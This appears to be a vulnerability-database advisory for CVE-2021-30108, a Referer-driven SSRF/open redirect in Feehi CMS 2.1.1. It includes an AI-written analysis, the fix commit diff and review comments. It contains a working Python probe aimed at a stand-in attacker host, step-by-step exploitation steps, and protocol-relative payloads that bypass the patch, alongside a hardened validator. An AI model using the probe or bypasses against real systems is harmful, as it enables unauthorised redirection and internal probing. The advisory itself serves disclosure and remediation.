VYPR
Critical severity · NVD Advisory · Published May 24, 2021 · Updated Aug 3, 2024

CVE-2021-30108

Description

Feehi CMS 2.1.1 is affected by a Server-side request forgery (SSRF) vulnerability. When the user modifies the HTTP Referer header to any url, the server can make a request to it.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Feehi CMS 2.1.1 is vulnerable to server-side request forgery (SSRF) via the HTTP Referer header, allowing an attacker to make the server send requests to arbitrary URLs.

Vulnerability

Feehi CMS version 2.1.1 is affected by a server-side request forgery (SSRF) vulnerability that is triggered by setting the HTTP Referer header to an arbitrary URL [1][3]. The login flow stores the Referer value as the post-login return URL without validating it, so after a successful login the server redirects to whatever URL the client supplied. The fix commit on this page changes the Location header emitted by an overridden Response::redirect(); what the diff shows is therefore the server redirecting the client to the attacker's URL (an open-redirect pattern) rather than fetching that URL itself, and the SSRF classification follows NVD's description [1].

Exploitation

An attacker first registers an account and logs out. They then send a GET request for the login page with the HTTP Referer header set to an attacker-controlled URL (for example a Burp Collaborator domain) and, in the same session, submit the login form via POST with valid credentials. The server processes the login and, using the stored Referer value as the return URL, redirects to the attacker's URL, which produces the request to the attacker's host reported in [3].
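The request sequence above, as an added example that is not part of the advisory or of Feehi CMS. It is a small Python probe for a tester's workstation: the login path, the Yii-style form field names (LoginForm[username], LoginForm[password], the hidden _csrf input) and the attacker URL are all assumptions, and the sample responses in the test are constructed. The network part only runs from the command line; the parsing and the Location check are plain functions so they can be exercised offline.

```python
"""Probe for the Referer-driven redirect described on this page.

Added example, not Feehi CMS code. Assumed: a Yii-style login form at
/site/login with LoginForm[username], LoginForm[password] and a hidden
_csrf input. ATTACKER_URL is a constructed placeholder.
"""
import http.client
import re
import sys
from urllib.parse import urlencode, urlsplit

ATTACKER_URL = "http://attacker.example/cve-2021-30108"  # constructed placeholder

CSRF_RE = re.compile(r'name="_csrf"\s+value="([^"]+)"')


def extract_csrf(html: str) -> str:
    """Pull Yii's hidden _csrf input out of a login page; '' if absent."""
    m = CSRF_RE.search(html)
    return m.group(1) if m else ""


def cookie_header(set_cookie_values) -> str:
    """Collapse Set-Cookie header values into one Cookie request header."""
    pairs = [v.split(";", 1)[0].strip() for v in set_cookie_values if v]
    return "; ".join(pairs)


def location_leaks_to(headers: dict, attacker_url: str) -> bool:
    """True when a redirect's Location points at the attacker's host.

    Scheme-qualified (http://host/...) and protocol-relative (//host/...)
    targets both count, because a browser treats both as absolute. Keys in
    `headers` are expected lower-cased.
    """
    loc = headers.get("location", "")
    if not loc:
        return False
    wanted = urlsplit(attacker_url).hostname
    # Some browsers fold '/\host' into '//host'; normalise before parsing.
    got = urlsplit(loc.replace("\\", "/")).hostname
    return wanted is not None and got == wanted


def probe(host: str, username: str, password: str,
          attacker_url: str = ATTACKER_URL, login_path: str = "/site/login") -> dict:
    """Replay GET-with-Referer then POST-login; return the final response headers."""
    conn = http.client.HTTPConnection(host, timeout=10)
    # Step 1: fetch the login page with the attacker-controlled Referer.
    conn.request("GET", login_path, headers={"Referer": attacker_url})
    page = conn.getresponse()
    html = page.read().decode("utf-8", "replace")
    cookies = cookie_header(page.headers.get_all("Set-Cookie") or [])
    # Step 2: log in with valid credentials in the same session.
    body = urlencode({
        "_csrf": extract_csrf(html),
        "LoginForm[username]": username,
        "LoginForm[password]": password,
    })
    conn.request("POST", login_path, body=body, headers={
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": cookies,
        "Referer": attacker_url,
    })
    resp = conn.getresponse()
    resp.read()
    return {"status": resp.status, **{k.lower(): v for k, v in resp.getheaders()}}


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: probe.py HOST USERNAME PASSWORD")
    result = probe(*sys.argv[1:])
    print("redirects to attacker host:", location_leaks_to(result, ATTACKER_URL))
```

Run it only against a system you are authorised to test; a 302 whose Location resolves to the attacker host confirms the behaviour, while a redirect to a local path such as /site/index indicates the return URL is being sanitised.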

Impact

Successful exploitation lets an attacker steer requests to arbitrary internal or external URLs, which can be used to probe internal services or map the network and may lead to information disclosure or further compromise of internal systems [1][3]. The claim that local files can be read via the file:// scheme requires the server itself to fetch the URL with a client that supports that scheme; the fix commit on this page only touches HTTP redirect handling and mail link construction, so that claim is unverified here.

Mitigation

A fix was committed to the Feehi CMS repository (commit d45cb9c, "fix: host header inject") [2]. It overrides Yii's Response::redirect() so that when the resolved redirect URL contains a scheme ("://"), the Location header is replaced with the path and query of the user's stored return URL, or "/" if none is set, and it switches the password-reset mail templates from urlManager->createAbsoluteUrl(), which derives the host from the request, to a Util::assembleAbsoluteURL() helper. Because the new check only looks for "://", protocol-relative targets of the form //host/path are not caught and still reach the Location header. No release containing the fix is listed on this page (the affected-versions table shows <= 2.1.1 and no patched version), so users should apply the commit or update to a version that includes it.
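To make the redirect-target check concrete, here is an added example in Python that is neither Feehi CMS code nor part of the commit. patched_target() is a transcription of the decision in the commit's Response::redirect(), with Url::to() and Yii's getReturnUrl() replaced by plain string arguments; safe_target() is a stricter allow-list check that this page does not ship, and the sample URLs are constructed.

```python
"""Redirect-target validation: the commit's rule, transcribed, beside a stricter one.

Added example, not Feehi CMS code. patched_target() mirrors the logic in the
fix commit (Url::to()/getReturnUrl() replaced by plain strings); safe_target()
is a hardened alternative written for this page. All URLs are constructed.
"""
from urllib.parse import urlsplit, urlunsplit


def patched_target(url: str, return_url: str) -> str:
    """Commit logic: if url contains '://', use return_url's path+query, else '/'.

    Anything without '://' is passed through unchanged, which is why a
    protocol-relative '//host/...' target survives this check.
    """
    if "://" not in url:
        return url
    parts = urlsplit(return_url)
    new_url = parts.path + ("?" + parts.query if parts.query else "")
    return new_url or "/"


def safe_target(url: str, fallback: str = "/") -> str:
    """Allow only same-site, path-absolute targets; everything else becomes `fallback`.

    Rejects empty input, control characters and whitespace, scheme-qualified
    URLs, protocol-relative '//host' and the '/\\host' form some browsers
    normalise to '//host'. The fragment is dropped from the result.
    """
    if not url or url[0] != "/" or any(ord(c) < 0x21 for c in url):
        return fallback
    if len(url) > 1 and url[1] in "/\\":
        return fallback
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:  # a bare path never has either
        return fallback
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    for candidate in ("http://evil.example/", "//evil.example/", "/\\evil.example/",
                      "/site/index?x=1#top", ""):
        print(repr(candidate).ljust(24),
              "patched ->", repr(patched_target(candidate, "/site/index?x=1")).ljust(20),
              "safe ->", repr(safe_target(candidate)))
```

The stricter function keeps the fix's intent (never leave the site after login) while closing the protocol-relative gap; in a Yii application the equivalent check belongs in the same redirect() override, applied to the final Location value rather than only to the "://" case.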

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                 Affected versions   Patched versions
feehi/cms (Packagist)   <= 2.1.1            (none listed)

Affected products: 2

Patches: 1
d45cb9cb26d6

fix: host header inject

https://github.com/liufee/cms · liufee · Aug 29, 2022 · via GHSA
6 files changed · +63 −6
  • common/components/Response.php (+50 −0, added)
    @@ -0,0 +1,50 @@
    +<?php
    +
    +namespace common\components;
    +
    +use Yii;
    +use yii\helpers\Url;
    +
    +class Response extends \yii\web\Response
    +{
    +    public function redirect($url, $statusCode = 302, $checkAjax = true)
    +    {
    +        if (is_array($url) && isset($url[0])) {
    +            // ensure the route is absolute
    +            $url[0] = '/' . ltrim($url[0], '/');
    +        }
    +        $request = Yii::$app->getRequest();
    +        $url = Url::to($url);
    +        if(  strpos($url, "://") !== false ){
    +            $newURL = "";
    +            $array = parse_url(Yii::$app->getUser()->getReturnUrl());
    +            isset($array['path']) && $newURL .= $array['path'];
    +            isset($array['query']) && $newURL .= "?" . $array['query'];
    +            if ($newURL == ""){
    +                $url = "/";
    +            }else{
    +                $url = $newURL;
    +            }
    +        }
    +        if ($checkAjax) {
    +            if ($request->getIsAjax()) {
    +                if (in_array($statusCode, [301, 302]) && preg_match('/Trident\/|MSIE[ ]/', (string)$request->userAgent)) {
    +                    $statusCode = 200;
    +                }
    +                if ($request->getIsPjax()) {
    +                    $this->getHeaders()->set('X-Pjax-Url', $url);
    +                } else {
    +                    $this->getHeaders()->set('X-Redirect', $url);
    +                }
    +            } else {
    +                $this->getHeaders()->set('Location', $url);
    +            }
    +        } else {
    +            $this->getHeaders()->set('Location', $url);
    +        }
    +
    +        $this->setStatusCode($statusCode);
    +
    +        return $this;
    +    }
    +}
    \ No newline at end of file
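Review bot: the absolute-URL test at `if(  strpos($url, "://") !== false ){` misses protocol-relative targets: `//evil.example/` contains no `://`, so it reaches `$this->getHeaders()->set('Location', $url);` untouched and the browser follows it as an absolute redirect; `/\evil.example` behaves the same in browsers that normalise `/\` to `//`. Replace the substring test with a check that the resolved URL starts with a single `/` followed by neither `/` nor `\` (or combine `yii\helpers\Url::isRelative()` with an explicit `/\` rejection) and apply it to the final value, not only to the `://` branch. Two smaller points: the fallback reads `Yii::$app->getUser()->getReturnUrl()` instead of sanitising the `$url` that was actually passed in, so a caller that redirected somewhere unrelated silently lands on the stored return URL; and the override has no doc comment saying why it replaces the parent's redirect, which a one-line reference to this advisory would fix.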
    
  • common/config/main.php (+3 −0, modified)
    @@ -31,6 +31,9 @@
                 'password' => '',
                 'charset' => '',
             ],
    +        'response' => [
    +            'class' => common\components\Response::className(),
    +        ],
             'cdn' => [//support Qiniu(七牛) TencentCloud(腾讯云) Aliyun(阿里云) Netease(网易云) more detail for visit http://doc.feehi.com/cdn.html
                 'class' => feehi\cdn\DummyTarget::className(),//DummyTarget will not use and cdn
             ],
    
  • common/mail/backend/passwordResetToken-html.php (+3 −2, modified)
    @@ -1,10 +1,11 @@
     <?php
     use yii\helpers\Html;
    +use common\helpers\Util;
     
     /* @var $this yii\web\View */
    -/* @var $user backend\models\AdminUser */
    +/* @var $user common\models\AdminUser */
     
    -$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['admin-user/reset-password', 'token' => $user->password_reset_token]);
    +$resetLink = Util::assembleAbsoluteURL(['admin-user/reset-password', 'token' => $user->password_reset_token]);
     ?>
     <div class="password-reset">
         <p>Hello <?= Html::encode($user->username) ?>,</p>
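Review bot: `Util::assembleAbsoluteURL()` is not part of this diff, so a reviewer cannot confirm that it takes the host from configuration rather than from the request; if it still falls back to `Yii::$app->request->hostInfo`, the Host-header injection named in the commit title survives in the password-reset link. Include the helper in the change (or link its definition) and document in `common/helpers/Util` that the base URL must come from a configured host setting. The `@var` change from `backend\models\AdminUser` to `common\models\AdminUser` is an unrelated doc fix; fine to keep, but worth calling out in the commit message.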
    
  • common/mail/backend/passwordResetToken-text.php (+3 −2, modified)
    @@ -1,9 +1,10 @@
     <?php
    +use common\helpers\Util;
     
     /* @var $this yii\web\View */
    -/* @var $user backend\models\AdminUser */
    +/* @var $user common\models\AdminUser */
     
    -$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['admin-user/reset-password', 'token' => $user->password_reset_token]);
    +$resetLink = Util::assembleAbsoluteURL(['admin-user/reset-password', 'token' => $user->password_reset_token]);
     ?>
     Hello <?= $user->username ?>,
     
    
  • common/mail/passwordResetToken-html.php (+2 −1, modified)
    @@ -1,10 +1,11 @@
     <?php
     use yii\helpers\Html;
    +use common\helpers\Util;
     
     /* @var $this yii\web\View */
     /* @var $user common\models\User */
     
    -$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['site/reset-password', 'token' => $user->password_reset_token]);
    +$resetLink = Util::assembleAbsoluteURL(['site/reset-password', 'token' => $user->password_reset_token]);
     ?>
     <div class="password-reset">
         <p>Hello <?= Html::encode($user->username) ?>,</p>
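Review bot: the `$resetLink` produced here is the security-relevant output, and the diff does not show what `Util::assembleAbsoluteURL()` does with the request host, so a regression test would lock the fix in better than the template edit alone: render this template with a spoofed `Host` header and assert that the host in `$resetLink` equals the configured domain. Without that, a later change to the helper could reintroduce the problem without touching any of these four templates.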
    
  • common/mail/passwordResetToken-text.php (+2 −1, modified)
    @@ -1,9 +1,10 @@
     <?php
    +use common\helpers\Util;
     
     /* @var $this yii\web\View */
     /* @var $user common\models\User */
     
    -$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['site/reset-password', 'token' => $user->password_reset_token]);
    +$resetLink = Util::assembleAbsoluteURL(['site/reset-password', 'token' => $user->password_reset_token]);
     ?>
     Hello <?= $user->username ?>,
     
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 5

News mentions: 0

No linked articles in our index yet.